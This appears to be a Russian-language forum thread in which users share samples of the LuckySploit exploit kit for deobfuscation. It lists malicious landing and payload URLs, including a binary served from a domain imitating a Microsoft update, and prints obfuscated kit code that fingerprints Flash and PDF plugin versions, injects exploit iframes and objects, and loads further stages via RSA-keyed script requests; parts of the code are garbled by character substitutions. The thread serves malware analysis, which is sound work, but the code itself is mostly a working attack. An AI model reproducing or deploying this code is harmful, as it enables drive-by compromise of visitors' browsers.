Адреса связок

Отслеживать
еще один оч интересный лаки. расковырять не хватило терпения. хорошо обфусцированный код перемешнный с дом-ом.
главный урл http://tusset.de/, из него вызываются http://4rtoon.com/temp/z/static.php , http://tusset.de.22b013029324a0b6.longebook.cn/qq.cn/ , http://lousecn.cn/

грузит бинарник http://www.microsoft.com.v6.js.update.meny...un.cn/forum.php
JAVA spl's:
http://lousecn.cn/res/3FC7BE/j2
http://lousecn.cn/res/2FAF4B/j2
http://lousecn.cn/load/CC59E6/j2
http://lousecn.cn/res/FAE13D/j2
http://lousecn.cn/res/CB3B28/j2
http://lousecn.cn/res/449ABF/j2

дальше лень
 
это вроде старый лаки .. хотя внутри тож самое
ниже кодес для малзилы ...

Код: 
//LuckySploit template by Antnet


IDarray = new Array;

function output(arg){
  document.writeln("-- " + arg);
}

function element(ID, innerHTML){
  this.elemType = "";
  this.innerHTML = innerHTML;
  this.attr1 = "";
  this.attr2 = "";

  this.setAttribute = function(attr1, attr2)
  {
    this.attr1 = attr1;
    this.attr2 = attr2;
    output(this.elemType + ".setAttribute( " + attr1 + " , " + attr2 + " )");
  }
  this.CreateObject = function(objType){
    output(this.elemType + ".CreateObject( " + objType + " )");
    return new ActiveXObject(objType);
  }
  this.GetObject = function(objType){
    output(this.elemType + ".GetObject( " + objType + " )");
    return new ActiveXObject(objType);
  }
  IDarray[ID] = this;
};

document.createElement = function(elemType){
  output("createElement( " + elemType + " )");
  elem = new element("tempID", "");
  elem.elemType = elemType;

  elem.watch("innerHTML",
    function(prop, oldval, newval){
      output(elem.elemType + "." + prop + "= " + newval)
      return newval
    }
  )
  return elem;
}

document.getElementById = function(ID){
  return IDarray[ID];
};

function location () {
  this.href = "";
};

document.location = new location;

document.location.watch("href",
function(prop, oldval, newval){
  output( "location." + prop + "= " + newval)
    return newval
  }
)

function ActiveXObject(axName){
  output("ActiveXObject( " + axName + " )");
  this.axName = axName;
  this.responseBody = "response body";
  this.Type = 1;
  this.Mode = 0;
  this.SnapshotPath = "";

  this.PrintSnapshot = function(){
    output(this.axName + ".SnapshotPath( " + this.SnapshotPath + " )")
  }
  this.GetVariable = function(varName){
    output(this.axName + ".GetVariable( " + varName + " )");
    return "9,0,0,0"; // SWF version
  }
  this.GetVersions = function(){
    output(this.axName + ".GetVersions()");
    return "7=0=0=0"; // PDF version
  }
  this.open = function(oper, param){
    output(this.axName + ".open( " + oper + " , " + param + " )");
    return this;
  }
  this.send = function(data){
    output(this.axName + ".send( " + data + " )");
  }
  this.Open = function(){
    output(this.axName + ".Open()");
  }
  this.Close = function(){
    output(this.axName + ".Close()");
  }
  this.Write = function(data){
    output(this.axName + ".Write( " + data + " )");
  }
  this.SaveToFile = function(file, mode){
    output(this.axName + ".SaveToFile( " + file + " )");
  }
  this.Run = function(data){
    output(this.axName + ".Run( " + data + " )");
  }
  this.ShellExecute = function(data){
    output(this.axName + ".ShellExecute( " + data + " )");
  }
}

function Image(){
  this.src = "";
  this.height = 59;
}

function setTimeout(){}
function clearInterval(){}
function setInterval(){}

//place Kalimero output under this line




Fqyh = new element("Fqyh","ezi#ii=9@ii+=NZ6rr()@ii+=dn2h()@");
gnf8 = new element("gnf8","vezo(\"DSUO\").rmmviSGNO#=#vezo(\"wcHD\")@");
szz4 = new element("szz4","DSUO=vezo(\"wlxfnvmg\").xivzgvVovnvmg(\"wre\")@");
Ezz1 = new element("Ezz1","wcHD=fmvhxzkv('*6Xlyqvxg*79xozhhrw*6W*77xohrw*6Zw72xwy3v-zv3w-88xu-03y1-555446459999*77*79xlwvyzhv*6W*77sggk*6Z//wldmolzw.nzxilnvwrz.xln/kfy/hslxpdzev/xzyh/uozhs/hduozhs.xzy*76evihrlm*6W5*7X9*7X80*7X9*77*79drwgs*6W*778*77*79svrtsg*6W*778*77*79zortm*6W*77nrwwov*77*6V*6Xkzizn*79mznv*6W*77nlerv*77*79ezofv*6W*77hdu*7Vksk*77/*6V*6Xkzizn*79mznv*6W*77jfzorgb*77*79ezofv*6W*77srts*77/*6V*6Xkzizn*79mznv*6W*77ytxloli*77*79ezofv*6W*77*76uuuuuu*77/*6V*6Xvnyvw*79hix*6W*77hdu*7Vksk*77/*6V*6X/lyqvxg*6V')@");
Jjl8 = new element("Jjl8","TrVO=''@");
Xgz3 = new element("Xgz3","ar7_G_l2Q.hvgZggiryfgv(\"gbkv\",#\"zkkorxzgrlm/kwu\")@");
qfn2 = new element("qfn2","ar7_G_l2Q.hvgZggiryfgv(\"svrtsg\",#799)@");
MdJt = new element("MdJt","ezi#ar7_G_l2Q#=#wlxfnvmg.xivzgvVovnvmg(af3W7_08A)@");
Vdnl = new element("Vdnl","riNH=yfBr.TvgEvihrlmh().hkorg(',')@");
Rmk6 = new element("Rmk6","yfBr=mfoo@");
TbV1 = new element("TbV1","EQbW=vezo(\"ZxgrevCLyqvxg\")@");
Bgb6 = new element("Bgb6","obpg#=#mvd#Ziizb(9,9,9)@");
Rab2 = new element("Rab2","Mvz6@");
Gnp3 = new element("Gnp3","yfBr=mvd#EQbW(\"ZxilKWU.KWU\")@");
mfv3 = new element("mfv3","yfBr=mvd#EQbW(\"KWU.KwuXgio\")@");
Wsi1 = new element("Wsi1","riNH=riNH[9].hkorg('=').glHgirmt()@");
Xaj2 = new element("Xaj2","riNH=riNH.ivkozxv(mvd#IvtVck(\"\\\\W\",\"t\"),\"\")@");
Bfv3 = new element("Bfv3","OpsC=1@#HeQl=7@#Noye=9@#ywzh=9@#xmfe=8@#InjG=8@#EP4o=2@#Nbuk=7@");
URe3 = new element("URe3","Lhpj='kwu5.ksk?g=5#&#o='+riNH@");
mCD8 = new element("mCD8","Lhpj='kwu.ksk?g=5#&#o='+riNH@");
Bvg7 = new element("Bvg7","ezi#af3W7_08A#=#\"ruiznv\"@");
jdos = new element("jdos","ar7_G_l2Q.hvgZggiryfgv(\"hix\",#Lhpj)@");
GrX3 = new element("GrX3","ar7_G_l2Q.hvgZggiryfgv(\"drwgs\",#699)@");
FWz8 = new element("FWz8","wlxfnvmg.ylwb.zkkvmwXsrow(ar7_G_l2Q)@");
Hny3 = new element("Hny3","ezi#hdw=9@");
GEl3 = new element("GEl3","TrVO=(mvd#ZxgrevCLyqvxg(\"HslxpdzevUozhs.HslxpdzevUozhs.0\")).TvgEzirzyov(\"$\"+\"evihrlm\").hkorg(\",\")@");
nhn6 = new element("nhn6","hdw=8@");
pJH0 = new element("pJH0","hdw=8@");

 SlR3=document;
 ipl8="innerHTML";
 Ayk6="getElementById";
 eval("TcT5"+"=e"+"va"+"l;");
 function JDwy(Apw3, wqd8, Clf2)
 {
   var Gxj0;
   Gxj0=Apw3.split(wqd8);
   var LvY0=Gxj0.join(Clf2);
   return LvY0;
   /**/
 }
 function LIF8(CvI1)
 {
   CvI1 = JDwy(CvI1,"#&#","&");
   CvI1 = JDwy(CvI1,"#g#",">");
   CvI1 = JDwy(CvI1,"#l#","<");
   LvY0="";
   Xrk0 ="";
   for(k=0;k<CvI1.length;k++)
   {
     LvY0 = CvI1.charCodeAt(k);
     if (LvY0==32)
     {
       LvY0=35
     }
     else/**/if (LvY0==35)
     {
       LvY0=32
     }
     else/**/if (LvY0==59)
     {
       LvY0=64
     }
     else/**/if (LvY0==64)
     {
       LvY0=59
     }
     else/**/if (LvY0==37)
     {
       LvY0=42
     }
     else/**/if (LvY0==42)
     {
       LvY0=37
     }
     else/**/if (LvY0>=97 && LvY0<=122)
     {
       LvY0=LvY0-97;
       LvY0=25-LvY0;
       LvY0+=97;
     }
     else/**/if (LvY0>=65 && LvY0<=90)
     {
       LvY0=LvY0-65;
       LvY0=25-LvY0;
       LvY0+=65;
     }
     else/**/if (LvY0>=48 && LvY0<=57)
     {
       LvY0=LvY0-48;
       LvY0=9-LvY0;
       LvY0+=48;
     }
     Xrk0 += String.fromCharCode(LvY0);
   }
   return Xrk0;
   /**/
 }
 function MA3ii()
 {
   var Nea3;
   try
   {
     TcT5(LIF8(SlR3[Ayk6]('TbV1')[ipl8]));
     TcT5(LIF8(SlR3[Ayk6]('Bgb6')[ipl8]));
     TcT5(LIF8(SlR3[Ayk6]('Rmk6')[ipl8]));
     TcT5(LIF8(SlR3[Ayk6]('Rab2')[ipl8]));
     try
     {
       TcT5(LIF8(SlR3[Ayk6]('Gnp3')[ipl8]));
     }
     catch(Nea3)
     {
     }
     if(!buYi)
     {
       try
       {
         TcT5(LIF8(SlR3[Ayk6]('mfv3')[ipl8]));
       }
       catch(fHEy)
       {
       }
     }
     if(buYi)
     {
       TcT5(LIF8(SlR3[Ayk6]('Vdnl')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('Wsi1')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('Xaj2')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('Bfv3')[ipl8]));
       if(irMS<=812)
       {
         if(irMS>=800 && irMS<=812)
         {
           TcT5(LIF8(SlR3[Ayk6]('URe3')[ipl8]));
         }
         if(irMS<800)
         {
           TcT5(LIF8(SlR3[Ayk6]('mCD8')[ipl8]));
         }
         TcT5(LIF8(SlR3[Ayk6]('Bvg7')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('MdJt')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('jdos')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('GrX3')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('qfn2')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('Xgz3')[ipl8]));
         TcT5(LIF8(SlR3[Ayk6]('FWz8')[ipl8]));
         return 1
       }
       return 0
     }
     else return 0
   }
   catch(fdy)
   {
   }
   return 0
 }
 TcT5(LIF8(SlR3[Ayk6]('Hny3')[ipl8]));
 function wm7s()
 {
   if (swd==1)
   {
     return 0
   }
   var yD6G;
   /**/ try
   {
     TcT5(LIF8(SlR3[Ayk6]('Jjl8')[ipl8]));
     TcT5(LIF8(SlR3[Ayk6]('GEl3')[ipl8]));
   }
   catch(yD6G)
   {
   }
   if(yD6G!='[object Error]')
   {
     if(GiEL[2]<124)
     {
       TcT5(LIF8(SlR3[Ayk6]('Ezz1')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('szz4')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('gnf8')[ipl8]));
       TcT5(LIF8(SlR3[Ayk6]('nhn6')[ipl8]));
       return 1;
       /*1*/
     }
   }
   TcT5(LIF8(SlR3[Ayk6]('pJH0')[ipl8]));
   return 0
 }
 TcT5(LIF8(SlR3[Ayk6]('Fqyh')[ipl8]));
 
Не знаю,видел кто-нибудь это из вас или может уже выкладывали.Вроде из Лаки


Код: 
function ZJH(a, B){
  ci = "";
  for (i = 0; i < b; i ++ ){
    var d = Math.floor(Math.random() * a.length);
    ci += a.substring(d, d + 1)
  }
  return ci
}
MDM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function hexToString(d){
  a = "";
  b = 0;
  c = 1;
  for (i = 0; i < d.length; i ++ ){
    if (d.charAt(i) == "=" || d.charAt(i) == "\n")break;
    b = b * 64 + MDM.indexOf(d.charAt(i));
    c = (c == 1 ? 64 : c/4);if(c!=64){a+=String.fromCharCode(parseInt(b/c));
    b %= c
  }
}
return a
}
oil = 0;
function CHR(a, B){
k = "";
if (isNaN(oil)){
  k = oil;
  oil = 0
}
s = new Array();
k += a;
a = k;
for (i = oil; i < 256; i ++ )s[i] = i;
j = oil;
for (i = oil; i < 256; i ++ ){
  j = (j + s[i] + a.charCodeAt(i % a.length)) % 256;
  x = s[i];
  s[i] = s[j];
  s[j] = x
}
i = oil;
j = oil;
c = "";
for (y = 0; y < b.length; y ++ ){
  i = (i + 1) % 256;
  j = (j + s[i]) % 256;
  x = s[i];
  s[i] = s[j];
  s[j] = x;
  c += String.fromCharCode(b.charCodeAt(y) ^ s[(s[i] + s[j]) % 256])
}
return c
}
function rc4Decrypt(a, B){
return CHR(a, B)
}
VRF = ((0xdeadbeefcafe & 0xffffff) == 0xefcafe);
function A(a, b, c){
if (a != null)if ("number" == typeof a)this .fromNumber(a, b, c);
else if (b == null && "string" != typeof a)this .LMR(a, 256);
else this .LMR(a, B)
}
function nbi(){
return new A(null)
}
function RHD(i, x, w, j, c, n){
while ( -- n >= 0){
  var v = x * this [i ++ ] + w[j] + c;
  c = Math.floor(v
/0x4000000);w[j++]=v&0x3ffffff}return c}function XLK(i,x,w,j,c,n){var a=x&0x7fff,xh=x>>15;
while(--n>=0){var l=this[i]&0x7fff;var h=this[i++]>>15;var m=xh*l+h*a;l=a*l+((m&0x7fff)<<1
5)+w[j]+(c&0x3fffffff);c=(l>>>30)+(m>>>15)+xh*h+(c>>>30);w[j++]=l&0x3fffffff}return c}func
tion PGX(i,x,w,j,c,n){var a=x&0x3fff,xh=x>>14;while(--n>=0){var l=this[i]&0x3fff;var h=thi
s[i++]>>14;var m=xh*l+h*a;l=a*l+((m&0x3fff)<<14)+w[j]+c;c=(l>>28)+(m>>14)+xh*h;w[j++]=l&0x
fffffff}return c}if(VRF&&(navigator.appName=="Microsoft Internet Explorer")){A.prototype.a
m=XLK;B=30}else if(VRF&&(navigator.appName!="Netscape")){A.prototype.am=RHD;B=26}else{A.pr
ototype.am=PGX;B=28}A.prototype.DB=B;A.prototype.DM=((1<<B)-1);A.prototype.DV=(1<<B);var B
I_FP=52;A.prototype.FV=Math.pow(2,BI_FP);A.prototype.F1=BI_FP-B;A.prototype.F2=2*B-BI_FP;v
ar CGN="0123456789abcdefghijklmnopqrstuvwxyz";var BSP=new Array();var rr,vv;rr="0".charCod
eAt(0);for(vv=0;vv<=9;++vv)BSP[rr++]=vv;rr="a".charCodeAt(0);for(vv=10;vv<36;++vv)BSP[rr++
]=vv;rr="A".charCodeAt(0);for(vv=10;vv<36;++vv)BSP[rr++]=vv;function FBL(n){return CGN.cha
rAt(n)}function DFC(s,i){var c=BSP[s.charCodeAt(i)];return(c==null)?-1:c}function TZO®{f
or(var i=this.t-1;i>=0;--i)r[i]=this[i];r.t=this.t;r.s=this.s}function FIG(x){this.t=1;thi
s.s=(x<0)?-1:0;if(x>0)this[0]=x;else if(x<-1)this[0]=x+DV;else this.t=0}function nbv(i){va
r r=nbi();r.GKN(i);return r}function BYK(s,B){var k;if(b==16)k=4;else if(b==8)k=3;else if(
b==256)k=8;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else{this.fromRadix(s,B);re
turn}this.t=0;this.s=0;var i=s.length,mi=false,sh=0;while(--i>=0){var x=(k==8)?s[i]&0xff:D
FC(s,i);if(x<0){if(s.charAt(i)=="-")mi=true;continue}mi=false;if(sh==0)this[this.t++]=x;el
se if(sh+k>this.DB){this[this.t-1]|=(x&((1<<(this.DB-sh))-1))<<sh;this[this.t++]=(x>>(this
.DB-sh))}else this[this.t-1]|=x<<sh;sh+=k;if(sh>=this.DB)sh-=this.DB}if(k==8&&(s[0]&0x80)!
=0){this.s=-1;if(sh>0)this[this.t-1]|=((1<<(this.DB-sh))-1)<<sh}this.FUF();if(mi)A.GSQ.TQC
(this,this)}function ZWN(){var c=this.s&this.DM;while(this.t>0&&this[this.t-1]==c)--this.t
}function TZV(B){if(this.s<0)return"-"+this.NCG().ZQZ(B);var k;if(b==16)k=4;else if(b==8)k
=3;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else return this.toRadix(B);var a=(
1<<k)-1,d,m=false,r="",i=this.t;var p=this.DB-(i*this.DB)%k;if(i-->0){if(p<this.DB&&(d=thi
s[i]>>p)>0){m=true;r=FBL(d)}while(i>=0){if(p<k){d=(this[i]&((1<<p)-1))<<(k-p);d|=this[--i]
>>(p+=this.DB-k)}else{d=(this[i]>>(p-=k))&a;if(p<=0){p+=this.DB;--i}}if(d>0)m=true;if(m)r+
=FBL(d)}}return m?r:"0"}function FEP(){var r=nbi();A.GSQ.TQC(this,r);return r}function TQB
(){return(this.s<0)?this.NCG():this}function WCE(a){var r=this.s-a.s;if(r!=0)return r;var 
i=this.t;r=i-a.t;if(r!=0)return r;while(--i>=0)if((r=this[i]-a[i])!=0)return r;return 0}fu
nction CHE(x){var r=1,t;if((t=x>>>16)!=0){x=t;r+=16}if((t=x>>8)!=0){x=t;r+=8}if((t=x>>4)!=
0){x=t;r+=4}if((t=x>>2)!=0){x=t;r+=2}if((t=x>>1)!=0){x=t;r+=1}return r}function NJJ(){if(t
his.t<=0)return 0;return this.DB*(this.t-1)+CHE(this[this.t-1]^(this.s&this.DM))}function 
PDI(n,r){var i;for(i=this.t-1;i>=0;--i)r[i+n]=this[i];for(i=n-1;i>=0;--i)r[i]=0;r.t=this.t
+n;r.s=this.s}function DHP(n,r){for(var i=n;i<this.t;++i)r[i-n]=this[i];r.t=Math.max(this.
t-n,0);r.s=this.s}function IIO(n,r){var a=n%this.DB;var b=this.DB-a;var d=(1<<b)-1;var e=M
ath.floor(n/this .DB), c = (this .s << a) & this .DM, i;
  for (i = this .t - 1; i >= 0;-- i){
    r[i + e + 1] = (this [i] >> B) | c;
    c = (this [i] & d) << a
  }
  for (i = e - 1; i >= 0;-- i)r[i] = 0;
  r[e] = c;
  r.t = this .t + e + 1;
  r.s = this .s;
  r.FUF()
}
function SHK(n, r){
  r.s = this .s;
  var a = Math.floor(n
/this.DB);if(a>=this.t){r.t=0;return}var b=n%this.DB;var c=this.DB-b;var d=(1<<b)-1;r[0]=t
his[a]>>b;for(var i=a+1;i<this.t;++i){r[i-a-1]|=(this[i]&d)<<c;r[i-a]=this[i]>>b}if(b>0)r[
this.t-a-1]|=(this.s&d)<<c;r.t=this.t-a;r.FUF()}function FZJ(a,r){var i=0,c=0,m=Math.min(a
.t,this.t);while(i<m){c+=this[i]-a[i];r[i++]=c&this.DM;c>>=this.DB}if(a.t<this.t){c-=a.s;w
hile(i<this.t){c+=this[i];r[i++]=c&this.DM;c>>=this.DB}c+=this.s}else{c+=this.s;while(i<a.
t){c-=a[i];r[i++]=c&this.DM;c>>=this.DB}c-=a.s}r.s=(c<0)?-1:0;if(c<-1)r[i++]=this.DV+c;els
e if(c>0)r[i++]=c;r.t=i;r.FUF()}function BFM(a,r){var x=this.abs(),y=a.abs();var i=x.t;r.t
=i+y.t;while(--i>=0)r[i]=0;for(i=0;i<y.t;++i)r[i+x.t]=x.am(0,y[i],r,i,0,x.t);r.s=0;r.FUF()
;if(this.s!=a.s)A.GSQ.TQC(r,r)}function PYD®{var x=this.abs();var i=r.t=2*x.t;while(--i>
=0)r[i]=0;for(i=0;i<x.t-1;++i){var c=x.am(i,x[i],r,2*i,0,1);if((r[i+x.t]+=x.am(i+1,2*x[i],
r,2*i+1,c,x.t-i-1))>=x.DV){r[i+x.t]-=x.DV;r[i+x.t+1]=1}}if(r.t>0)r[r.t-1]+=x.am(i,x[i],r,2
*i,0,1);r.s=0;r.FUF()}function QUF(m,q,r){var a=m.abs();if(a.t<=0)return;var b=this.abs();
if(b.t<a.t){if(q!=null)q.GKN(0);if(r!=null)this.FOT®;return}if(r==null)r=nbi();var y=nbi
(),ts=this.s,ms=m.s;var c=this.DB-CHE(a[a.t-1]);if(c>0){a.YKI(c,y);b.YKI(c,r)}else{a.FOT(y
);b.FOT®}var d=y.t;var f=y[d-1];if(f==0)return;var g=f*(1<<this.F1)+((d>1)?y[d-2]>>this.
F2:0);var h=this.FV/g, d2 = (1 << this .F1) / g, e = 1 << this .F2;
  var i = r.t, j = i - d, t = (q == null) ? nbi() : q;
  y.ENN(j, t);
  if (r.ZBQ(t) >= 0){
    r[r.t ++ ] = 1;
    r.TQC(t, r)
  }
  A.ONE.ENN(d, t);
  t.TQC(y, y);
  while (y.t < d)y[y.t ++ ] = 0;
  while ( -- j >= 0){
    var k = (r[ -- i] == f) ? this .DM : Math.floor(r[i] * h + (r[i - 1] + e) * d2);
    if ((r[i] += y.am(0, k, r, j, 0, d)) < k){
      y.ENN(j, t);
      r.TQC(t, r);
      while (r[i] <-- k)r.TQC(t, r)
    }
  }
  if (q != null){
    r.MHM(d, q);
    if (ts != ms)A.GSQ.TQC(q, q)
  }
  r.t = d;
  r.FUF();
  if (c > 0)r.OVF(c, r);
  if (ts < 0)A.GSQ.TQC(r, r)
}
function XJU(a){
  var r = nbi();
  this .abs().QXG(a, null, r);
  if (this .s < 0 && r.ZBQ(A.GSQ) > 0)a.TQC(r, r);
  return r
}
function HXX(m){
  this .m = m
}
function OZF(x){
  if (x.s < 0 || x.ZBQ(this .m) >= 0)return x.mod(this .m);
  else return x
}
function EIN(x){
  return x
}
function SBT(x){
  x.QXG(this .m, null, x)
}
function CFT(x, y, r){
  x.NNJ(y, r);
  this .CET®
}
function LGY(x, r){
  x.WRW®;
  this .CET®
}
HXX.prototype.GLC = OZF;
HXX.prototype.WUG = EIN;
HXX.prototype.CET = SBT;
HXX.prototype.JNZ = CFT;
HXX.prototype.SII = LGY;
function XVW(){
  if (this .t < 1)return 0;
  var x = this [0];
  if ((x & 1) == 0)return 0;
  var y = x & 3;
  y = (y * (2 - (x & 0xf) * y)) & 0xf;
  y = (y * (2 - (x & 0xff) * y)) & 0xff;
  y = (y * (2 - (((x & 0xffff) * y) & 0xffff))) & 0xffff;
  y = (y * (2 - x * y % this .DV)) % this .DV;
  return (y > 0) ? this .DV - y :- y
}
function BLR(m){
  this .m = m;
  this .mp = m.EIR();
  this .mpl = this .mp & 0x7fff;
  this .mph = this .mp >> 15;
  this .um = (1 << (m.DB - 15)) - 1;
  this .mt2 = 2 * m.t
}
function FFO(x){
  var r = nbi();
  x.abs().ENN(this .m.t, r);
  r.QXG(this .m, null, r);
  if (x.s < 0 && r.ZBQ(A.GSQ) > 0)this .m.TQC(r, r);
  return r
}
function QDW(x){
  var r = nbi();
  x.FOT®;
  this .CET®;
  return r
}
function LJU(x){
  while (x.t <= this .mt2)x[x.t ++ ] = 0;
  for (var i = 0; i < this .m.t;++ i){
    var j = x[i] & 0x7fff;
    var a = (j * this .mpl + (((j * this .mph + (x[i] >> 15) * this .mpl) & this .um) << 
    15)) & x.DM;
    j = i + this .m.t;
    x[j] += this .m.am(0, a, x, i, 0, this .m.t);
    while (x[j] >= x.DV){
      x[j] -= x.DV;
      x[ ++ j] ++ 
    }
  }
  x.FUF();
  x.MHM(this .m.t, x);
  if (x.ZBQ(this .m) >= 0)x.TQC(this .m, x)
}
function JXU(x, r){
  x.WRW®;
  this .CET®
}
function OBD(x, y, r){
  x.NNJ(y, r);
  this .CET®
}
BLR.prototype.GLC = FFO;
BLR.prototype.WUG = QDW;
BLR.prototype.CET = LJU;
BLR.prototype.JNZ = OBD;
BLR.prototype.SII = JXU;
function BSD(){
  return ((this .t > 0) ? (this [0] & 1) : this .s) == 0
}
function UUI(e, z){
  if (e > 0xffffffff || e < 1)return A.ONE;
  var r = nbi(), r2 = nbi(), g = z.GLC(this ), i = CHE(e) - 1;
  g.FOT®;
  while ( -- i >= 0){
    z.SII(r, r2);
    if ((e & (1 << i)) > 0)z.JNZ(r2, g, r);
    else {
      var t = r;
      r = r2;
      r2 = t
    }
  }
  return z.WUG®
}
function TWM(e, m){
  var z;
  if (e < 256 || m.VNM())z = new HXX(m);
  else z = new BLR(m);
  return this .exp(e, z)
}
A.prototype.FOT = TZO;
A.prototype.GKN = FIG;
A.prototype.LMR = BYK;
A.prototype.FUF = ZWN;
A.prototype.ENN = PDI;
A.prototype.MHM = DHP;
A.prototype.YKI = IIO;
A.prototype.OVF = SHK;
A.prototype.TQC = FZJ;
A.prototype.NNJ = BFM;
A.prototype.WRW = PYD;
A.prototype.QXG = QUF;
A.prototype.EIR = XVW;
A.prototype.VNM = BSD;
A.prototype.exp = UUI;
A.prototype.ZQZ = TZV;
A.prototype.NCG = FEP;
A.prototype.abs = TQB;
A.prototype.ZBQ = WCE;
A.prototype.HOL = NJJ;
A.prototype.mod = XJU;
A.prototype.LIB = TWM;
A.GSQ = nbv(0);
A.ONE = nbv(1);
function NFN(){
  this .i = 0;
  this .j = 0;
  this .S = new Array()
}
function MDI(a){
  var i, j, t;
  for (i = 0; i < 256;++ i)this .S[i] = i;
  j = 0;
  for (i = 0; i < 256;++ i){
    j = (j + this .S[i] + a[i % a.length]) & 255;
    t = this .S[i];
    this .S[i] = this .S[j];
    this .S[j] = t
  }
  this .i = 0;
  this .j = 0
}
function IDT(){
  var t;
  this .i = (this .i + 1) & 255;
  this .j = (this .j + this .S[this .i]) & 255;
  t = this .S[this .i];
  this .S[this .i] = this .S[this .j];
  this .S[this .j] = t;
  return this .S[(t + this .S[this .i]) & 255]
}
NFN.prototype.init = MDI;
NFN.prototype.next = IDT;
function ZIY(){
  return new NFN()
}
var VYF = 256;
var HKN;
var HWI;
var URZ;
function NYC(x){
  HWI[URZ ++ ] ^= x & 255;
  HWI[URZ ++ ] ^= (x >> 8) & 255;
  HWI[URZ ++ ] ^= (x >> 16) & 255;
  HWI[URZ ++ ] ^= (x >> 24) & 255;
  if (URZ >= VYF)URZ -= VYF
}
function KJK(){
  NYC(new Date().getTime())
}
if (HWI == null){
  HWI = new Array();
  URZ = 0;
  var t;
  if (navigator.appName == "Netscape" && navigator.appVersion < "5" && window.crypto){
    var z = window.crypto.random(32);
    for (t = 0; t < z.length;++ t)HWI[URZ ++ ] = z.charCodeAt(t) & 255
  }
  while (URZ < VYF){
    t = Math.floor(65536 * Math.random());
    HWI[URZ ++ ] = t >>> 8;
    HWI[URZ ++ ] = t & 255
  }
  URZ = 0;
  KJK()
}
function ESH(){
  if (HKN == null){
    KJK();
    HKN = ZIY();
    HKN.init(HWI);
    for (URZ = 0; URZ < HWI.length;++ URZ)HWI[URZ] = 0;
    URZ = 0
  }
  return HKN.next()
}
function ESHs(a){
  var i;
  for (i = 0; i < a.length;++ i)a[i] = ESH()
}
function BHB(){
}
BHB.prototype.NVN = ESHs;
function DBU(a, r){
  return new A(a, r)
}
function KOZ(s, n){
  var a = "";
  var i = 0;
  while (i + n < s.length){
    a += s.substring(i, i + n) + "\n";
    i += n
  }
  return a + s.substring(i, s.length)
}
function XZC(B){
  if (b < 0x10)return "0" + b.ZQZ(16);
  else return b.ZQZ(16)
}
function GIF(s, n){
  if (n < s.length + 11){
    return null
  }
  var a = new Array();
  var i = s.length - 1;
  while (i >= 0 && n > 0)a[ -- n] = s.charCodeAt(i -- );
  a[ -- n] = 0;
  var b = new BHB();
  var x = new Array();
  while (n > 2){
    x[0] = 0;
    while (x[0] == 0)b.NVN(x);
    a[ -- n] = x[0]
  }
  a[ -- n] = 2;
  a[ -- n] = 0;
  return new A(a)
}
function RSAKey(){
  this .n = null;
  this .e = 0;
  this .d = null;
  this .p = null;
  this .q = null;
  this .MVW = null;
  this .JWC = null;
  this .WWU = null
}
function YHM(N, E){
  if (N != null && E != null && N.length > 0 && E.length > 0){
    this .n = DBU(N, 16);
    this .e = parseInt(E, 16)
  }
}
function XUK(x){
  return x.LIB(this .e, this .n)
}
function YET(a){
  if (oil > 1){
    oil = ZJH(MDM, 53);
    a = ci
  }
;
  var m = GIF(a, (this .n.HOL() + 7) >> 3);
  if (m == null)return null;
  var c = this .doPublic(m);
  if (c == null)return null;
  var h = c.ZQZ(16);
  if ((h.length & 1) == 0)return h;
  else return "0" + h
}
RSAKey.prototype.doPublic = XUK;
RSAKey.prototype.setPublic = YHM;
RSAKey.prototype.encrypt = YET;
sss = "";
for (oil = 0; oil < 53; oil ++ )sss += String.fromCharCode(Math.floor(75 + Math.sin(oil) * 
21));
rsa = new RSAKey();
rsa.setPublic("
ad178d44552cacfb3a8f1d087496d10558efed75acb5c6f8b7e6ac28914920aab3d171741f361fb7da65321c13
7f050c710ec267da07d079c924667fd5fc4d41", "10001");
res = rsa.encrypt(sss);
nextkey = res;
var scriptTag = document.createElement("script");
scriptTag.src = "?" + res;
document.body.appendChild(scriptTag);


Код: 
nextkey = '';
k = '';
vers = new Array();
function check_flash_vuln(){
  /**/e4flash;
  try {
    /**/Flashver = '';
    /**/Flashver = (new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9')).GetVariable('$' + 
    'version');
    var flash_re =/ ([0 - 9, ] + )/;
    Flashver = flash_re.exec(Flashver)[1];
    Flashver = Flashver.split(',');
  }
  catch (e4flash){
  }
  if (e4flash != '[object Error]'){
    flash_real_ver = Flashver[0] + ':' + Flashver[1] + ':' + Flashver[2];
    return flash_real_ver;
  }
  return 0;
}
try {
  vers.push('f', check_flash_vuln());
}
catch (e){
}
function check_pdf_vuln(){
  /**/WlHmRwck = new Array(0, 0, 0);
  /**/DWhq4qTe = eval('null');
  /**/epdf;
  try {
    DWhq4qTe = new ActiveXObject('AcroPDF.PDF')
  }
  catch (epdf){
  }
  if (!DWhq4qTe){
    try {
      DWhq4qTe = new ActiveXObject('PDF.PdfCtrl')
    }
    catch (/**/ej8889793ff){
    }
  }
  if (DWhq4qTe){
    /**/FPUkcU5N = DWhq4qTe['GetVersions']()['split'](',');
    snum =- 1;
    try {
      for (index_pdf = 0; index_pdf < FPUkcU5N.length; index_pdf ++ )if (FPUkcU5N[
      index_pdf].indexOf('Script') !=- 1)snum = index_pdf;
    }
    catch (e){
    }
    if (snum ==- 1)snum = 0;
    FPUkcU5N = FPUkcU5N[snum]['split']('=')['toString']();
    FPUkcU5N = FPUkcU5N.replace(new RegExp('[^0-9]+', 'g'), '');
    WlHmRwck[0] = FPUkcU5N['charAt'](0);
    WlHmRwck[1] = FPUkcU5N['charAt'](1);
    WlHmRwck[2] = FPUkcU5N['charAt'](2);
    return WlHmRwck[0] + WlHmRwck[1] + WlHmRwck[2];
  }
  return 0
}
try {
  vers.push('p', check_pdf_vuln());
}
catch (e){
}
res2 = 'versions=' + vers;
res2 = rsa.encrypt(res2);
nextkey = 'versions=' + vers + res2;
